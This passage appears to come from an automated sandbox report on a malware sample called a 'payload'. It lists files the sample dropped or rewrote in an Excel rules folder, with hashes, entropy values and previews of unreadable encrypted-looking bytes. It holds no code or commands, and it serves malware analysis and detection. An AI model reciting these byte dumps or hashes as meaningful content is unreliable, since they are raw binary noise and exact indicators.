                                                                                                      SHA-256:C252C26D66B69A6D30D384DD08403C442053B41944375658B2D1948673C0D47C
                                                                                                      SHA-512:62ADBAB5BEB0DC468F360270980F91A0BDE1845BC08EA08C6D7F4EFDCC7FB34590D969D3B165CC897920D46DD9B9B3D46689776C7783FDCB09D8776E93BF2E4F
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml....p.E9.Yb.|....Z..4...&..2`l..O.+5..bE.U........-.a%.......%...%`...e.@.5`...#..../(@.....V.=.V...n4~.?.....@......ci....".R~....!M+N.9............8.s?m._e......e...J].P.t..+.....{..+x...>H.........o.G.J.........$..@..X./`..(..K`$.P...g..m^...S.<.../@.MO|.[./.......%t..O^..'.ED.K~~.4..b%.../.)...l.zfm............K.@...E.....{....d.>........]...I).1..u...'!#Jp......HY(....._V.4F...O.........._.D..1...,.....:...8Z..H!.....PEt.......5..X.-'..f..a..u...*p.Y../...r..P(....y..d..A4..)^.1.......!%w...\.."....d.....z...B.%.....c.[@..,n..m...*...t...Q..^.*g:....e....+...m&...'.......JFd.D.TMN..Q...Z0../|.4..1(...g...]...3.O.&P.)~.Ru.K.....<@.8Z..xgR..fOJ....!.5.....0$j.3..i.Q~l..W..q.......S@6w.V\8kK_...M29....UWU6>..D.&Ngg.l..{..i.v.c.ff3-#W.va..^^....I..6.h....qg...n....h...Z.[.%~.K....*.l..Lx..1.C...S1}..|H7A.oW.c#....L..A./....n...U.|.....9CoE7r....=I..,...U..s".)?....={C....:.U.....By...h.!.Y.!.....O...../..VwP..]BRgD..@.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120682v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):834
                                                                                                      Entropy (8bit):7.702078544500411
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:cieFTd2f9dKSUIkp4FcteJR2WlmMDdHQ0Bv70KoYcov6bD:+49dKxWcMIWlmDE0KowwD
                                                                                                      MD5:9B6A3A20022E82CF2DFD924E3FC2AD89
                                                                                                      SHA1:21AA897DBD13959E6F42921E16B502FEA0CFB999
                                                                                                      SHA-256:7BD7AD7A35FC1418AD2B118214E34743EF97D17C2EC79013241C600EC3504C52
                                                                                                      SHA-512:A03FA3B5A63B83D05ED650E7EB867DD8FA3358563C45F31B6F215356176A9C5B0787654E17A88D02F8BEA63695DC33C93502000B224AFC710141BBA62FC55AD7
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml/..H.).F.-W.v0.2.k..K..!I.x2b.ieK....O.}37....5o.u.........#|S._..f ...k.k.#...}..4....zv.:L..,....(.l....?z....Mc.V.../...n...o..c|.].lR%.5...,.*..[.k...:dx.{.i.O......3!./.i@........4]..J.o(...Z.U.fFj......n.K...A..a?k.Fd-...d.x.O....a.!nUd0..y.I..t...#DM.1S|f...O.Rd._[...i.2.&..\ $z.&.S.....\........&*[..'....r...FlY..j..g..#.p..x0z.x...[.K~F?8q.h.`.7.......]...]_.#..f.a.X.-.$...H../. .]I..go...z.U...\...67.SuO.".(.#L2.B..G%=.Gh.m....u..Z.a..Z.)...<`.S....1tJ.z...b.QOcyv..M...|...B.6..R...u^.,..R.o..<g..A.d..V.o.4&0\.(g...74,2..G...9.....5.....+.~A....38...p.........@Nl5@.u&...qg\.....B...#I.haBr.K...+a.H.(.Q..1..j<X1q...Q...oS8.*2}...{|....?..1\].@#.......B....:."....+..x!..[..q....X...|...0j...{(d.%91..hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule130009v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):630
                                                                                                      Entropy (8bit):7.629035912004432
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:vMs5J/+50jYf6B3gGvZiuK2Svghm47O6wMC26lZAN2+BozOoTuonv6cii9a:B5HYyH0uK2SvgNwM1gZIoioyGv6bD
                                                                                                      MD5:0F098376B424C154DC35E67494012125
                                                                                                      SHA1:03556B2DD7C13651F2CAC90DA217A24D9A0DCCC3
                                                                                                      SHA-256:78A13C7EE5DF31B6DD7869A6133A6D420BA33B1A7C6A134FE8D66FDCB1720939
                                                                                                      SHA-512:0F46DF3058C47E9AE21323420AB5AF8033113FA7DE8727569F5DB361E0DC30E38D5AA2C84D92387911A4CF5A2A4F95BA31C721AB133C913A85F740E64FDBF9CB
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlw...k.-.......J>.>0.....zK.7...0...R.Vt...!........s?..7gE*....y.]..r.u.jr3..>..0s.y.z.\I?.apL6...\..-f5..C.@.....+:..0..N.Xzo.>W.>].w.gkyB$..>....~..%..GD.A;7...m`"....h.X6.=.U._.N.......~i.f.x.....}})D...8.fz..4........f?...\..ns_.?y......9.s.B:S...=Nr..9..#c..c...1.J!...r...(..`..>J..5.1....E...o.r..XL.....H]P+]W..#.7.7.N...0i...^..]y=...J|....%g...D*.tT......{.b...z@ac.!.b...=y_.RYg.....Sh.(.6....e.:.@'.mA^..c....R......3;....6. ...[.++...S........du. .]~q...v.%.a..I'.$.?....ef$....O..$....t........8...i."..X. hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule241000v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):4446
                                                                                                      Entropy (8bit):7.957488485887623
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:xP5C9C6wqkRtJf/d2Sfl0ceQRouMKOZGX/vqzR/hNZ9E3gpS:xP5C9MqOf/dwce6kKOZGX3qzR/hut
                                                                                                      MD5:925581E2F721898046EE406ACABC7EE1
                                                                                                      SHA1:5BE65AD174280D263CE018A36EC6179CE89BCA49
                                                                                                      SHA-256:63E3EB9E82A9CD5C8084993A047D74BEFA35F12C8966CEB8EB496834A5BFABF5
                                                                                                      SHA-512:359A48383135F6C10E6C63995769A06D5B2E1BBE54269F001841F7B69C01E051D616F7DEBB04E1C9525D132B2DC7E1BC79D740403C8C5807FAED2A2D2CCC180E
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml...yK.j;.o....6..\.G......../.gn..p.....-.......l8.Pp....K..T.._..j..sp$.....f.X.....K.?_..f...O....q.3..Q.Yr..z.NZel~..(.;.....Wv8..p.....:.a...C........u.....@..{..t.J*;h...es.v...w....+.v...A.s......4/./..5.N...b.k|*.N........Fr..F....=1...&......;t...Xf."..{..O.:..S.w]..:O..L..k..A..>+....K......a'..:==..F6...FX%n..*...(J{j.....+.o.S..G/..s..}f.7.Rt.\.".']....J....U.!t.h.I?.,.\F.........'..jS... ......B......VG.j.1.y.. .Pf.m2...X..Wt..p.aSn...*.\...L....8?....b._ .w..17..`.!.Z8.+...O.mr..uI.c..Z.9nn.s.y..5........._......C$e../.#j">I.bC.p...c..q.......+.....<........L.s...a...pl...og..a.;.|...M;...P.=X...^#.G.U...#p;3u.{..kO.X.....p..G_..}.%.#.._^..gv"5(A.uO..YOC....e.+...R.%..R..5:....].(E.$...K... ..<...A.|..N.?....3..n.IrIi..GO^.Io.1..B...pN....\.^...[.1".a....s..*.6R..[......m....Du..R.w..@..'..+..<.p.l..T.j.h.I....EpS.d.#..f.m..#^>......"..Z...9.;...^lvOEg..7.c...|OI.....~......2..,...^.~..4.......-......1E....h$

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule241001v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2306
                                                                                                      Entropy (8bit):7.9091236799010085
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:zbBB1bxa9sg236Wy/N6gXMsAJ9PdS63w+IwD:hXbxa9DI6WO6gcsA/L
                                                                                                      MD5:E25E325046CA3306A9E12E49DF71DCCD
                                                                                                      SHA1:21731F11F1F08B61BEBF8FE098AE8A5D746B37AE
                                                                                                      SHA-256:7CCAEADA61E05BAF7A4ABB87CA3B34D0F387702F6EABCD7387F453A24B482A5D
                                                                                                      SHA-512:A8DD84E0598AF2326D96618E4407188F6D94C145BFA6DEBD26EC248B9C4F7C7CEEF58494426BBF92773064952D2D3F5B6FD4A535248E4D2712544BA288C6EA20
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml...j%.}.h...ASWM...D..%V..s.J.IM.Q.L...~.s.g.J$....X.%... ..2...dgNt....p..#c...t...k.^....G.J...Q{j.q.}.[p{n.=../eU$.d.._.U~mL....Aj.B...|.v.A...'S..F...RC...$.!..I.:.:.N.5.A.<..b...i.x.@..Y..>...y%\.zs.l2..9.o...d.(..x6..Ka..:./...@.C.*aG..k........B.\!..y.@...D2$..$~fM....p....xO.#..h.....Y.F&:...Adp..:}4.7_..~V.##......].0tX2~......E/-...2Z........g|....K.$..JK.5.".Y..lV. ~....2.o.:.....]..6..k..aa...X`l.T...Jn....K.?..O...?.d.g..:...u2.5.IH6F[G...@)...oa.=.T...A*.DvW....H...#%..9.e.E.O..FZ...`!...k`..=..6...F%<....=,.D"|`..,[..\...Y@Q.8....qPu.u....u5.d.........j....1..48._.{....T..v.Uu^g..W....d.W...-m...>^...._.B.o6.~.W....;....g...>Xq.5..i=..hzp(.......T1,.Gj.._.U.yO.A.Z...a..T....q ...Ky.n.3l~..FI.........7.J..1.......Zk....P....2.... 9{.w.v]..fz.....a3N..;e.s@1.. ee...p..8.K..i.W.5.r...7C{ir?J....O.h.W....u....F..o....5....c.[.T..@....x..6...a&...[P2.S...../z..E.f../+./..j...TT....A.tOH..4-OD..F.3..d..5.:..'.....V'm?._Y.|z

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule241002v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2376
                                                                                                      Entropy (8bit):7.909631353581876
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:rH0QrZGDidb45ZrV5Tt/G1EFjxJtGTtwK30TC0Vy2LwD:r0K8DQbkZVRt/WJzJf1
                                                                                                      MD5:D55CC1400E110F45EFBF95628BAE437F
                                                                                                      SHA1:3824A0652A824C1D5E8AF3B0C7B18E24B565DD77
                                                                                                      SHA-256:A13D7537E6F0FC82A4A284F237C91FDDD8567DEFF02CC7158F3184FFF2FF02A9
                                                                                                      SHA-512:76C6730C5795B38BA16463DBC7196AC072714D51191007EC3A98648B6594BD594F28B503AB50AA11C329321D30EDEEE4F764A2CADDE473A42DFCFAE1BEDFFD1C
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml1.bW..[..}e/....u.....T.U.|....<.d...f.;=._.<.q"p.?...W.x.9......2....o{.'....<;.xr...0..Lj.@I.".o....x...B8..G...E......i.>[...h.......5...P.Q..h#..FVe..RO....+...l.d..jm..F....o..F...!.Y..@.f:d"...V ....k11....A..$......zm9...l^.9e*.M.H...C_.5..(a..J.x.<C}..@.....C.8?x.rX...2>.9a......?..'....F.ah.....A$D.4.E.<.k4Ft.......(H......BQd9.....n,..5....Y.zs.X.......E(&...y../E1.4_.^...<@....M...........Jj.!.k^.q.>H..b..l.U.H.L*.....S.d....W..,O9|.R..P.....sY.9...z..}....>@..6Rs...8h]!n...0. >.f..a.C.t.Z.L.\X.....0o....]....hC&N..|#..*.I....^"H..|..Rc..%.D......:.....LwZ.......h,..7.=.`........B.G...,O..a.....e.c9:...."#...T\)@.q....I.)......H[i..c...^.[j...q.%.)vst.&....(..h.P..Vi.B.{...$$......,}.._[B...Y@.Hr..I7.?..F.............{_,..XD...[0o.U...".1.4..#.E:.....|?x....+.X........j.aPr...ai."z0.$H..}..I...v...Fo.N.W...............;;.nF.2n..%o....d8D+kd.=.mv.....h.o..NL....BO...C..v,..|...!.X\.J9f*D.S.z..".E&q{...,....4......^#=

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270000v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1043
                                                                                                      Entropy (8bit):7.824212102809716
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:kbcQEB+T+1Yj2s3i4yNW6aEO0Nxa5IMTPyzav6bD:koQk+a1YjHANSEryI+wD
                                                                                                      MD5:E6E8FA870458404B0AFDB73CF9256C38
                                                                                                      SHA1:E3956B10116F31B89A785A3F70251D0B573A59C6
                                                                                                      SHA-256:C9001A8CC78972AE6980989EF05BC8098B7B67565BCC7C5A80FFBF7F2105514A
                                                                                                      SHA-512:3AF882D117AE5E350A6C73DC268568F17B23179EFBFC9097F41FA33F31EB156436CC3AA72CB32712DD39BE50BCC7E8A12A38A94139DF5FBAF65512A5E7DE2618
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml,.7x4.\.cEL%d..L.xie....#...6..X..#.kY}..}A..".u..ef...H..H`.p.x.........{/....E....xx...9.s.G....~.;ARx.G..@TI}._..X...h..B..$....L^....Ff..>..HMV.".N.k....%NQ..2...D..^..&.&..fO....E..0....[.w....(ou.!..zd..H...]...N.,.Uk..L...,'.i...L. ...<D..... .o...h..Sy.="...}:D)....vh..~....s.A.a....MIH...T...{.".......K.....O..~w...}.4.a.g[*".....w.-O..m.(..t..^.xT/.@cC...Y,..]..w-@......b...B.....(...0..b.8.0k..'d.......:L._.T$fL.....gQ...]:D...........\L.dB..E....h,..........so..yQV.".r.Y....1.4E.uM...F+....`.S&....N...d...9..r.0.wPd.7...n.J.P...ab..O]:w.r.g.@..,.?2z..`.t.....l..zf...b.c..."..'y%..,*D`..L........@....mM...n.....q..).}}t.h..:0.._..?.4.O'..(<j@..&@H..H..F.{....g.....I:.we/.i.P......*..w_)W..T..Fl.om8...*.?......3....[..B....s.}.i...e.7t..oh...Xl..B.].@....=o..qd".p.i}.>|. ._....4]PV.6o,gY&.u|W...<.....q......J.$..\O..%%Rv.BA.....{`i.......g.. Gn.6...{.S.U..P... .#..z..@..=.....i.J:..}=...hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEc

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270001v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):961
                                                                                                      Entropy (8bit):7.776866676395416
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:u4/cBh1O1jnB4Y01pWkLv62yzSUQouBACv6bD:l/cLQRB4YLxFNuBACwD
                                                                                                      MD5:1702DF8D990AAC293A9F5AC694483BB0
                                                                                                      SHA1:21543708DA246CE831D3EB192AD02885EF4CFF40
                                                                                                      SHA-256:56023DC22E01CB0E9D95420A180BEF025D6D1E6E1806986BB3F4E0B137248DB7
                                                                                                      SHA-512:478D143E30AD55B1E6502A209F5DEBB64B5C4E569BFAC05372B9D97390F579C97066543176B464F3AF7BF5BDA1B40556064FE0199C772B66867DD3C739A86749
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlxf0..]}()..........0}.+.....~...PY.....F..%....wB.......N.]@eg.ee...S.....JY../<.;..@....W..Oi\....9....SAO.'....P^C.../../.h.._../....A..R.y7.....r4.w\..o...{..a..|PW.=.6.;Q...Q0.$#..tW+a.G&.`..&.A.?NE...|..Rlf..1....F...aWL....=Z.w.p.W.8R...s..D..........`n+r.>..n{.\.{...R./...O..Y.$./.8}.M.g...yBZ%ZO..y@/...$.-.].A.# ..,.Hi...'..PX?X...d......Q....y....q..........|f^..0,].....=....w5..;.I.A.....m..w}....?{.......N.U.k8..{=^.....l...#X..~A...E..{lT....&..Xuv..+....V.Wr.[.C.0AJ.._.X.t..0X.]a(.|.X=.Y..../....X...iX..O.......C[..L.MM.E.q.........[0..$..n.x.u.%#.....5.m...RD..z%.O+@^.\...p...?.......#hz......... K.5D....|.....[.m..<....m.\.;)...2.IEA....+.....]n......y+....W.1.GX.~..|1..]'....M...!H.I(....4l;}......3.I~.."AGp...2..(...._.Bc...%.5...x7js.....`G.@.......1....5uyD.#..sX..}.h...).......6.h.......X.8...%O.`.o_.%.*/..$...hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270002v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1126
                                                                                                      Entropy (8bit):7.808248288204385
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:6u5wnCt477tDbrhZkwL1JciExpQPdaN1Dfq+AdPUrIohv6bD:6tv1rhqeUp1Dfq+AdsxhwD
                                                                                                      MD5:93D34082E9FE092483237640602636F3
                                                                                                      SHA1:27C9719B8796FE33B303045FD4714ED2FC779383
                                                                                                      SHA-256:6F5ED001BFCCAE3CF7A06ED073B638AF72085AC30B16F46A4F62442E17E423A9
                                                                                                      SHA-512:0F2FB6D2DFDD7BCA9B7EF6CB5A6D705E1D64071B025DBC3E3DB3D16B41DA66C96756577C9EAB639AC75662EC75AF74CC4822E0C34C2E30D9BFA7F3459ADEBB1B
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..k...^X..#.]&.<,$...=...I..j.s.....3f!.38.......&......_...',OSJ..qH.. .o*..3..%.E...P._"JW..Q$.....LRk.K;..p.{-..~..^.Gr..NOV7.....>....B...yGk...L<.v.T......oab4.2.V.i.]...`...R.D.I..<....T..}{...6...EY.VB.4P......R.iq..H.6&...L..L*v...Z.JG.(...L%.Y..].`.H.....D.z..c.U.P}...&.s.........ey...A.DLVy.W...k4...OM..[......B........bGL..[L..M.n.p..D...$7..<.V..].. .0./...Q.3......:..#.Aq#?......;..^U .../.rK.G@t$..(....P..Z../w....S<.F..N.........7......7..h.&...8Oo..L.r./3...>"d........f.Fd3...+..I..A..8...FU.K.1...r..6.:$..<B!X.........c.L[..p5.k...#..2.W....'.?.0...2.7....?..T-..m......g.[.&.++......&o,^..i.)...B.32...gG.^J`..y....;.$..=@2....A..{V....e....D.\.i.(.p)j......G.........Z.u$.b.X...z.ht./s..j.......g,..bseb.>D...E...KQ.*....,.%?H....].u..fbkd..b......!.'/.#.%.i.3YW....}QK3...'.1.%...Q....M.......+.pO.s..R.`....k.J.*.&5.,.'a(......p...=.....SE.A.u..*Xm>.......r..(.'A..r..........~.4..{<..t.9;..%....g..1X..`..

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270003v2.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1662
                                                                                                      Entropy (8bit):7.860986423656491
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:WbxOehdG7/t7UxijymIhLHM66ZzEA9POwD:WFzhql7UMOmc46UEGD
                                                                                                      MD5:D60D142709612D5F2D8BE2C0C6E17BFA
                                                                                                      SHA1:39D2BEB61E0A8BB6F0C40FB2F88F6587C3167A25
                                                                                                      SHA-256:12ADC91DF9C57C562AD2F2555E76D5981685F397E995CE83966F9980D2CBD538
                                                                                                      SHA-512:DF671F9924889429BECE355EBC1192D609FC92358727BB0F9948B17333212E7CB8C1C2ED6226C78EF8FA6B3028BF5B88C71922396CE58EB11F368CB854AC6F27
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml....4P.........?............p.5..[.B/..s.*y.......O..&VCL.M..!A........&..7.yf:.8h..^..m.........6....'.~....+p"./k}h)u...".f..@.!.,r...avlV..t._............4p.t.....&.r..H*z5_...@.....R..V.T.~..r>6..9m.wc..BdS.;.?a2.Dy..[@*c....v..9.S..A../....B.~.2..Q.7sV.....K.pPj&An.....H5...x..mj-.FT...$q.a..Z.....~......ts..m.|...p.?.v..6.N.(.%?..%T...)......K..:tH.t..n........Lk[ao3...*.......|.......}....r`..C.?..ed<,..a.....|.b.,uH.e.$.`..o....R.o.!..jW$.d..z.mL......?..}7....o....=...gi..p..q:...UE.6..t.#......s..(....V>+#E~`.}..2;..%.Y.5P../9.j}.#....m..mz.c.h.........t...v....=.xl...#o....M......_.e&.d....Z;.m..N:........[r.......4yS.W.Md....'..g....$..A._P..uy..w..K...VE..v.Q.h..f..g..G~....b_A.).......D..1..%$.~L8C...G.\&Om..A k........h...j......Sk..3..y..q&-m....O.rS%.8h........%F........}$*..._...&$..d.b).$m...k4o.WE.P..R.....H...........e51S....I......w4Q..~G.U.qg.32..R.$..........8....t..2w..&:.<..,.T.......b8.e..&...n

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270004v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):831
                                                                                                      Entropy (8bit):7.742344555768944
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:9v/JFyhq6zLa0CdGOQF5nPzJ4t86Iv6bD:9ZFy46La04Ktv6IwD
                                                                                                      MD5:9ADDEBFF22EC89C3D3E50D30A30874B5
                                                                                                      SHA1:EE111A638CBB5A3602C7752E0803B9D7BD279401
                                                                                                      SHA-256:62F641A5FA5A7CCB8D36618A1194CCD3126E80B60E92BEDE514247881516005E
                                                                                                      SHA-512:68A77EC110BAB813999A861F9966F03ECCCDAE0E0B598B23EC2511FE9BF60AF8B4C596BB7F0A6FB4AC359D5F985FC9B60696B8C447167101115FA112FE165E48
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml&.{...d.....].."..7..rT...u<vK.Y.zya..]cM.X..k......lC...?...P..+WT+'./.,...D.a.fc...M......)..7/5.qk.E..z`....?x.H;..y.".I..[...1.H*:|I.g..6...NT.b...h.+;w.*.j..$.x..nG.T...l..p.*_<.n... ....!m..;K..".......".....&F.E...%xU.n7e....v.w.O]....qQ....!..........r.-.P.dO...A..b^.M0ap.#..B3*..LCEM.oy.%z...\....*Gf..(....4......*C..7bF\.)d.. ...x..<.e.{jY.{..?z...N!bZ#B.8Q.3..Z....8...2/0.i..dk~.r...o....)....R....o<Ek.)E$....r(H_.#..wC....K......4..D.KS...fO.'...k..#.F.....`UN.1.,...^...r...LQH^C.$..g$.'.Y....1(..V%o...\!.N.L....Z.".R...D.k9...4...Ik0.sT..J...e.....AQn.d".zz.T.....,'J...G8.....m.$..x....>...D.l.K.&,H...f.e.0[6N..9...EP.]R..JU...........%}b.T...]M...1..1}..K|..J~.$.).64...7O..z...q}.z./.q+i..hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270005v4.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1485
                                                                                                      Entropy (8bit):7.874699149455714
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:nMjVvAGyOM+FLt/59Nc06I4B8dpPKoT35EQBDFKTdwcIOMAisoFHlHOiZhhUUGvk:gVIx+FtNcPAxhITdwcxdisoHlHNhwwD
                                                                                                      MD5:28F33421E9712E2BFDBAB065E50A8ED5
                                                                                                      SHA1:91CF50A02F4F6E7D708759914B1AA9FF28E62A54
                                                                                                      SHA-256:2331FFF836C710EC70738F505F38A588B5C038B65C64B482B74C6DFA43894F09
                                                                                                      SHA-512:D93A6927FCB164F998BF9EC76D1880099EF5221D0D3EC6E104F842673E256396A81056D04AFA10DCE2FBA460363F740B9D44E8DDBE0CD925DA996389898EB41E
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml...M'I...-f../..3.[.4...L.KBo.....x......|.n.....H.?.....J./`....+......-....o.e....C|..Z+...>..H(.#......5.T..S.<@..0.W..>A.%4(..8.K.B.!..W.mU@.X...L{..O......q..... R..zf..K~u.A......<\.?.K..@......S2.\.(.J.8..:.#.....|Gz.......".....N..$...dh..!..........g.&.MH.x.V..X..e.0|......)..c/.k......g.Pw.Jl.....<T.-.s|.%.,.s..fG.d.%..Qx.y.b.......Z...~K|3..d*.>h.....).@=D......./.....T]t(TLq...5W)]..s.Z..=.R.Q\Nf.61.q...6O.....z.Gm?.Y....).*s..p].;..}...,..mJ<...q.%.HI.Th..A......i*.._..X..".`..H%E.......^.~.S...[)......G...xF..8.PK.N2.U......3...m....N.^.......6G....k..;...^..].-O..h..IY..........],..H.a.YW...H"..+2A.../...3.Lz@....Q......R8Y.S".....S..M3...Kt...Qk...N...@.,#x.c.rL.N=.R..q..w..e...".\....*f.....1..}...&..g#.i.=S4ein..A..'.n'@....?.........s.=~.).]..)..+i.]...x.Q..O.\...k{.Un......]..qP.cB9..2....D..eU ..].G.~).........`"....i....^oy(q..t.Z..{H....&XE.......:....4..vG...M..?..@....^B1W[..P..V).9]/.%.......7...S.5.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270006v3.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2088
                                                                                                      Entropy (8bit):7.898950587137243
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:fCOgm4iIHkFKX9WrgQYsSFsVdMOZ3F/iXqR5yYzwD:fCOgCIX9W81NFI/3oXL
                                                                                                      MD5:D369733B9FAACDDE64CEAD2F82399879
                                                                                                      SHA1:22F8661749C42EF83393D269836129AFCDD8CE73
                                                                                                      SHA-256:0B1B23168E4E3A36747B87A76B0D311B4B266A09B63B59D90873C9FD5980D535
                                                                                                      SHA-512:166CBFC05D846CADAC43E8F254F6E0450AE8751D15DD20B3938F5B98FA4D1AB04D548C930E59077937F9EE7048DC984073B2F09BA31E8A142405B39602B7505C
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml...{-.c"S.I......}|..}\Y^$H^....#.%....$.....^.2ef......h....A.@.....&y>..IQ....!.;.<WF...o..a`Oy"...6..3.....W....A..;.<...i-1....oBg.Oj12..{.nB..........B...".Kz.[M.O^.:..Q.......7.PHO.QM.8C"gSt....F....-.!|..=R...8.E~......q..^...Z.?k...s2."...S.......`T.K.q.....|\.../.}~.a......,......d.Q..H....i...-........vz.9.B.....(._St.........c..Gt.?.N..=.t...}7Zy.IZ'__Yw.N.......$.\.$M.[...3f.]....J@"3....~Kb.W-X..T!...`.*_....r.H>B.....-i...... .%...9bLN...C.=W...hSZ....."...rd..g$.K*4..B.....|oR.*..V.k(.6......L.IW@.../.........(.R\}L..1..o...6L..h....I...'..yvIy...^.v.k....x..#...F.x...,..B..{1..}\...G........<T.FIwjF.C6.z......f.@.sN..YZ...!p.....7.....@#.oIE._..W....l..~X....}.:...._.=..m.[....Et...5,V.sU.Z..:..[..3......^......USc>..o.Sn.8.)..n...-... c.Lj.Y..W...c%.I.....5..r.......C...9...y.:.f.U....2ga.&.y.I^......a..Kj`.=...^'....PC.].....<.}..B............=r..g_.Q...@o.c....R........F&.(sh[v..H...(....E.}.qf...me.^..,dFbB..CZe;I....

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270007v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):761
                                                                                                      Entropy (8bit):7.745790015741071
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:2SMEEdRfiPWYwq5rS9+/bHg+e2mdiEfZUZ8hcO+yyY+HHR+fivaSEcDnv6cii9a:27EEdliuYwOS9Aj7ekdYcOzyHHHRxnvk
                                                                                                      MD5:FACAC0AC27518BF50AB940FF922AF19F
